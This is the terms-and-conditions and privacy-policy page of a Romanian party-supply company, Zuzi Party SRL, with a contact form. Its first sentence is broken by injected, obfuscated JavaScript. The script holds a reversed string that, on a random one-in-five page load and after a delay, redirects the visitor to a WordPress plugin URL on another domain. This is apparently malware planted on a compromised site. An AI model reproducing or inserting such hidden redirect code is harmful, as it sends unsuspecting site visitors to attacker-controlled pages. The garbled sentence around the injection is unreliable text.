TERMENI SI CONDITII

”Vizitarea

) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and accesati site-ul nostru, a termenilor si conditiilor sub care sunt furnizate aceste servicii si produse.
Site-ul www.zuziparty.ro este detinut de Societatea Comerciala Zuzi Party SRL, cu sediul social in Bucuresti, Strada Valea Oltului nr. 123-129, sector 6, cu numarul de inregistrare la Registrul Comertului J40/4772/2011 si RO28359986, Capital Social: 200 lei.
Folosirea sub orice forma si in orice scop a materialelor publicate pe site (inclusiv numele, designul si structura site-ului, imaginile, fotografiile, texte), fara acordul SC ZUZIPARTY SRL este interzisa.” icon=”icon-attention-alt” title=”TERMENI SI CONDITII”]

POLITICA DE CONFIDENTIALITATE

Conform cerinţelor Legii nr. 677/2001 pentru protecţia persoanelor cu privire la prelucrarea datelor cu caracter personal şi libera circulaţie a acestor date, modificată şi completată şi ale Legii nr. 506/2004 privind prelucrarea datelor cu caracter personal şi protecţia vieţii private în sectorul comunicaţiilor electronice SC ZUZI PARTY SRL are obligaţia de a administra în condiţii de siguranţă şi numai pentru scopurile specificate, datele personale pe care ni le furnizaţi despre dumneavoastră. Scopul colectării datelor este de a va tine la curent cu noutatile despre activitatea noastra .
Nu sunteţi obligat(ă) să furnizaţi datele cerute, acestea sunt insa necesare pentru a va putea trimite oferta pe care o solicitati.
Observaţie:
*orice persoană are dreptul de a se opune, pentru motive legitime, la prelucrarea datelor ce o privesc.
*orice persoană are, de asemenea, dreptul de a se opune, în mod gratuit şi fără nicio justificare, la prelucrarea datelor sale personale în scopuri de marketing direct.

ALTE CLAUZE

Ne straduim permanent pentru a pastra acuratetea informatiilor din acest site.
Nu suntem raspunzatori pentru situatiile care pot aparea din cauza unor erori de software sau defectiuni tehnice aparute la server sau terti.
Pentru orice alte detalii sau informatii nu ezita sa ne contactezi prin mail sau le telefon. Iti raspundem cu cea mai mare placere.
Pentru nelamuriri va rugam sa accesati pagina de contact.

Locatie

Contact

Nume (obligatoriu)

Email (obligatoriu)

Subiect

Mesaj